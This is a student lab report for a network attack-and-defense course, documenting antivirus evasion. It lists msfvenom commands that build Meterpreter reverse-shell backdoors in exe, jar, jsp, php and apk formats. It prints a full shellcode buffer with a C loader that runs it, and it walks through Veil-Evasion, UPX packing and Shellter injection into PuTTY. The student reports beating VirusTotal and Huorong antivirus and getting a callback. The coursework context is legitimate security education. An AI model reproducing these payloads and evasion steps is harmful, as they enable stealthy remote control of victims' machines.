2019-2020-2 20175317钟睿文《网络对抗技术》Exp3 免杀原理与实践

#2019-2020-2 20175317钟睿文《网络对抗技术》Exp3 免杀原理与实践

1.1 实践目标

(1l)任务一:正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用shellcode编程等免杀工具或技巧

(2)任务二:通过组合应用各种技术实现恶意代码免杀

(3)任务三:用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本

1.2 基础知识

  • 免杀原理

    • 免杀技术全称为反杀毒技术Anti Anti- Virus简称“免杀”,它指的是一种能使病毒木马免于被杀毒软件查杀的技术。由于免杀技术的涉猎面非常广,其中包含反汇编、逆向工程、系统漏洞等黑客技术,所以难度很高。其内容基本上都是修改病毒、木马的内容改变特征码,从而躲避了杀毒软件的查杀。

    • 如果要做好免杀,就要清楚杀毒软件(恶意软件检测工具)是如何工作的。AV(Anti-virus)是很大一个产业。

任务一:正确使用免杀工具或技巧

1.正确使用msf编码器

在实验二中已经生成了未经编码处理exe类型的后门程序,将其放到VirusTotal或Virscan(网站链接在文末参考资料中)中查看结果,这里由于VirusTotal中的杀软数量远多于Virscan,所以我选择了VirusTotal:

2019-2020-2 20175317钟睿文《网络对抗技术》Exp3 免杀原理与实践_第1张图片

由此可见不加任何处理的后门程序能够被大多数杀软检测到,接下来用msf编码器对后门程序进行一次到多次的编码,并进行检测

  • -e用来选择编码器
  • -b用来去除需要去除的字符,应使'\x00'不出现在shellcode中,因为shellcode以'\x00'为结束符
  • -i设置迭代次数,这里设置迭代次数为10

生成一次编码的后门程序:

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b '\x00' LHOST=192.168.122.136 LPORT=5317 -f exe > exp3.exe

2019-2020-2 20175317钟睿文《网络对抗技术》Exp3 免杀原理与实践_第2张图片

2019-2020-2 20175317钟睿文《网络对抗技术》Exp3 免杀原理与实践_第3张图片

生成十次编码的后门程序:

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b '\x00' LHOST=192.168.122.136 LPORT=5317 -f exe > encoded10.exe

2019-2020-2 20175317钟睿文《网络对抗技术》Exp3 免杀原理与实践_第4张图片

2019-2020-2 20175317钟睿文《网络对抗技术》Exp3 免杀原理与实践_第5张图片

由此可见经过编码后虽然被检测出的概率下降了,但是大多数杀软还是可以将其检测出来。

2.msfvenom生成如jar之类的其他文件

  • 生成jar文件:
msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.122.136 LPORT=5317 x> 20175317jar.jar

VirusTotal检测结果:

2019-2020-2 20175317钟睿文《网络对抗技术》Exp3 免杀原理与实践_第6张图片

  • 生成jsp文件:
msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.122.136 LPORT=5317 x> 20175317jsp.jsp

VirusTotal检测结果:

2019-2020-2 20175317钟睿文《网络对抗技术》Exp3 免杀原理与实践_第7张图片

  • 生成php文件:
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.122.136 LPORT=5317 x> 20175317php.php

VirusTotal检测结果:

2019-2020-2 20175317钟睿文《网络对抗技术》Exp3 免杀原理与实践_第8张图片

  • 生成apk文件:
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.122.136 LPORT=5317 x> 20175317apk.apk

VirusTotal检测结果:

2019-2020-2 20175317钟睿文《网络对抗技术》Exp3 免杀原理与实践_第9张图片

3.使用veil-evasion生成后门程序

使用sudo apt-get install veil进行veil的安装

2019-2020-2 20175317钟睿文《网络对抗技术》Exp3 免杀原理与实践_第10张图片

安装完成后提示有的部分没有安装成功,根据提示加后缀重新进行安装:

2019-2020-2 20175317钟睿文《网络对抗技术》Exp3 免杀原理与实践_第11张图片

安装完成后输入veil命令,这里使用热点进行安装会快很多,这里安装python会无响应……下载完成后会提示运行/usr/share/veil/config/setup.sh --force --silent

2019-2020-2 20175317钟睿文《网络对抗技术》Exp3 免杀原理与实践_第12张图片

但是在运行该指令时会反复提示找不到wine32,提示apt-get install wine32,但是安装的时候又…… o_o ....

2019-2020-2 20175317钟睿文《网络对抗技术》Exp3 免杀原理与实践_第13张图片

上网查了一下,要执行如下指令安装wine32

mkdir -p ~/.cache/wine
cd ~/.cache/wine 
wget http://dl.winehq.org/wine/wine-gecko/2.47/wine_gecko-2.47-x86.msi
wget http://dl.winehq.org/wine/wine-gecko/2.47/wine_gecko-2.47-x86_64.msi

2019-2020-2 20175317钟睿文《网络对抗技术》Exp3 免杀原理与实践_第14张图片

之后把veil卸掉重新安装一遍就能成功了:

2019-2020-2 20175317钟睿文《网络对抗技术》Exp3 免杀原理与实践_第15张图片

使用sudo运行veil,输入use evasion

之后输入命令use c/meterpreter/rev_tcp.py进入配置界面

2019-2020-2 20175317钟睿文《网络对抗技术》Exp3 免杀原理与实践_第16张图片

使用set LHOST 192.168.122.136设置反弹连接IP地址

使用set LPORT 5317设置端口

2019-2020-2 20175317钟睿文《网络对抗技术》Exp3 免杀原理与实践_第17张图片

使用generate命令生成文件,接着输入生成的playload的名称veil20175317,保存路径为/var/lib/veil/output/source/veil20175317.exe

2019-2020-2 20175317钟睿文《网络对抗技术》Exp3 免杀原理与实践_第18张图片

按老规矩丢到virustotal中看看veil生成的隐蔽性如何 (●'◡'●)

2019-2020-2 20175317钟睿文《网络对抗技术》Exp3 免杀原理与实践_第19张图片

结果显示我们费九牛二虎之力下的veil效果也不是太好,依然有过半的杀软可以把它揪出来 ╯︿╰

4.使用C+shellcode编程生成后门程序

使用如下指令生成shellcode:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.122.136 LPORT=5317 -f c

创建20175317.c,将buf添加到代码中

unsigned char buf[] = 
"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52"
"\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1"
"\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b"
"\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03"
"\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b"
"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24"
"\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb"
"\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c"
"\x77\x26\x07\x89\xe8\xff\xd0\xb8\x90\x01\x00\x00\x29\xc4\x54"
"\x50\x68\x29\x80\x6b\x00\xff\xd5\x6a\x0a\x68\xc0\xa8\x7a\x88"
"\x68\x02\x00\x14\xc5\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50"
"\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68\x99\xa5"
"\x74\x61\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08\x75\xec\xe8\x67"
"\x00\x00\x00\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff"
"\xd5\x83\xf8\x00\x7e\x36\x8b\x36\x6a\x40\x68\x00\x10\x00\x00"
"\x56\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56"
"\x53\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58"
"\x68\x00\x40\x00\x00\x6a\x00\x50\x68\x0b\x2f\x0f\x30\xff\xd5"
"\x57\x68\x75\x6e\x4d\x61\xff\xd5\x5e\x5e\xff\x0c\x24\x0f\x85"
"\x70\xff\xff\xff\xe9\x9b\xff\xff\xff\x01\xc3\x29\xc6\x75\xc1"
"\xc3\xbb\xf0\xb5\xa2\x56\x6a\x00\x53\xff\xd5";
int main() 
{ 
    int (*func)() = (int(*)())buf; 
    func(); 
}


使用i686-w64-mingw32-g++ 20175317.c -o 20175317.exe生成exe可执行文件

2019-2020-2 20175317钟睿文《网络对抗技术》Exp3 免杀原理与实践_第20张图片

丢到virustotal中看看效果:

2019-2020-2 20175317钟睿文《网络对抗技术》Exp3 免杀原理与实践_第21张图片

看样子在大多数杀软面前还是会露出狐狸尾巴……

5.加壳工具

使用命令upx 20175317.exe -o 20175317pro.exe对20175317.exe加壳

2019-2020-2 20175317钟睿文《网络对抗技术》Exp3 免杀原理与实践_第22张图片

上传到virustotal中:

2019-2020-2 20175317钟睿文《网络对抗技术》Exp3 免杀原理与实践_第23张图片

加壳以后能够检测出的杀软少了,但是过半的杀软还是可以检测出的。

6.其他方法

采用Veil-Evasion的其他荷载生成后门方式 进入evasion,使用list查看可用的有效荷载:

2019-2020-2 20175317钟睿文《网络对抗技术》Exp3 免杀原理与实践_第24张图片

我选择的是第32个荷载,是Python下shellcode在DES下加密一种

2019-2020-2 20175317钟睿文《网络对抗技术》Exp3 免杀原理与实践_第25张图片

输入option查看有效荷载的选项

2019-2020-2 20175317钟睿文《网络对抗技术》Exp3 免杀原理与实践_第26张图片

修改用户名后使用generate生成,选择shellcode平台时选择2:msfvenom,payloads与IP、端口号使用tab自动获取

2019-2020-2 20175317钟睿文《网络对抗技术》Exp3 免杀原理与实践_第27张图片

输入图片说明

输入生成文件的文件名,选择Py2Exe生成exe文件

2019-2020-2 20175317钟睿文《网络对抗技术》Exp3 免杀原理与实践_第28张图片

之后,生成的rc文件放入了路径/var/lib/veil/output/handlers/中,可执行文件放入了/var/lib/veil/output/source/

将可执行文件上传到virustotal中看看效果:

2019-2020-2 20175317钟睿文《网络对抗技术》Exp3 免杀原理与实践_第29张图片

2019-2020-2 20175317钟睿文《网络对抗技术》Exp3 免杀原理与实践_第30张图片

这下所有杀软都没有检测出来 ○( ^皿^)っ

任务二:通过组合应用各种技术实现恶意代码免杀(如果成功实现了免杀的,简单语言描述原理,不要截图。与杀软共生的结果验证要截图。)

任务一中最后一个采用Veil-Evasion生成的Python下shellcode在DES下加密文件已经可以通过杀软检查,所以这步中我使用了Python下shellcode使用DES加密的载荷+加密壳生成的文件:

电脑环境:win10主机 杀毒引擎:火绒 杀软版本:2.8.90.11211

木马库版本时间:2020-03-24

2019-2020-2 20175317钟睿文《网络对抗技术》Exp3 免杀原理与实践_第31张图片

PS:我在网上还查找找到了使用Shellter注入动态Shellcode注入来实现免杀的效果,当用户打开被植入后门的软件时,只有触发一定的操作才会启动后门。 执行apt-get install shellter安装shellter,这里选择AutoA

2019-2020-2 20175317钟睿文《网络对抗技术》Exp3 免杀原理与实践_第32张图片

然后输入需要注入的exe文件路径

2019-2020-2 20175317钟睿文《网络对抗技术》Exp3 免杀原理与实践_第33张图片

设置相应的地址与端口

2019-2020-2 20175317钟睿文《网络对抗技术》Exp3 免杀原理与实践_第34张图片

2019-2020-2 20175317钟睿文《网络对抗技术》Exp3 免杀原理与实践_第35张图片

最后就成功生成了

2019-2020-2 20175317钟睿文《网络对抗技术》Exp3 免杀原理与实践_第36张图片

放到主机中也没有被查杀到,杀软对动态shellcode好像反应不是那么灵敏:

2019-2020-2 20175317钟睿文《网络对抗技术》Exp3 免杀原理与实践_第37张图片

任务三:用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本

电脑环境:win10主机 杀毒引擎:火绒 杀软版本:2.8.90.11211 木马库版本时间:2020-03-24

2019-2020-2 20175317钟睿文《网络对抗技术》Exp3 免杀原理与实践_第38张图片

实验中遇到的问题

问题一:安装veil的过程中一直提示缺少wine32,提示apt-get install wine32,安装时又会显示无法获取

2019-2020-2 20175317钟睿文《网络对抗技术》Exp3 免杀原理与实践_第39张图片

问题一解决方案:在安装前执行如下指令安装wine32

mkdir -p ~/.cache/wine
cd ~/.cache/wine 
wget http://dl.winehq.org/wine/wine-gecko/2.47/wine_gecko-2.47-x86.msi
wget http://dl.winehq.org/wine/wine-gecko/2.47/wine_gecko-2.47-x86_64.msi

2019-2020-2 20175317钟睿文《网络对抗技术》Exp3 免杀原理与实践_第40张图片

执行完成后就可以顺利进行安装了。

问题二:shellter输入需要注入的exe文件路径后注入失败

2019-2020-2 20175317钟睿文《网络对抗技术》Exp3 免杀原理与实践_第41张图片

问题二解决方案:通过查询了解到shellter需要注入SSH/Telnet程序以实现传输,所以需要下载PuTTY,PuTTY是一个免费的SSH/Telnet程序。此外,shellter的这个特性也限制了其应用,它只能用于局域网内。下载PuTTY后经过重新注入发现shellter可以注入到PuTTY.exe中。

实验收获与感想

在本次实验过程中我使用了几种不同的方法进行免杀尝试,做出VirusTotal杀不出的恶意代码时的感受比cs上段的感觉还要爽! 通过本次实践我进一步理解了免杀原理,同时对杀毒软件的可靠性有了新的认识( ̄▽ ̄)原来扫描后显示没有病毒不代表真的没有病毒,所以我们要从源头抓起,不浏览不安全的网页,不下载运行不明文件,减少恶意代码植入的机会。

问题回答

  • (1)杀软是如何检测出恶意代码的?

a.通过检测代码中的特征码或者某些特征片段,将其于自己的特征码库进行比对,如代码中检测出特征码或者某些特征片段,就将其判定为恶意代码。

b.监控进程行为有无异常,如果在运行时出现了非法越权行为等,就将其判定为恶意代码。

  • (2)免杀是做什么?

通过对恶意代码加壳或者进行编码等操作,隐藏代码中的特征码或者某些特征片段,起到混淆视听的作用,使得杀软不容易检测出该恶意代码,起到免杀的作用。

  • (3)免杀的基本方法有哪些?

a.改变特征码 使用encoder进行编码、重新编译生成可执行文件、加壳等手段改变特征码

b.改变行为

使用加密通信、增加正常功能的代码、使用隧道技术通讯等躲避或混淆杀毒软件起到免杀的作用

开启杀软能绝对防止电脑中恶意代码吗?

不能,通过本次实验已经能看出杀软不能检测出所有的恶意软件,杀软的病毒库中如果没有记录该特征片段,或着没有检测该恶意代码的有效手段则无法检测到该恶意代码,就不能及时杀掉电脑中的恶意代码。

参考资料

VirusTotal Virscan Kali Linux之软件安装、卸载、更新和修改更新源 MSF-Shellcode生成和使用 简介三款免杀工具(含BLACKHAT最新工具)

你可能感兴趣的:(2019-2020-2 20175317钟睿文《网络对抗技术》Exp3 免杀原理与实践)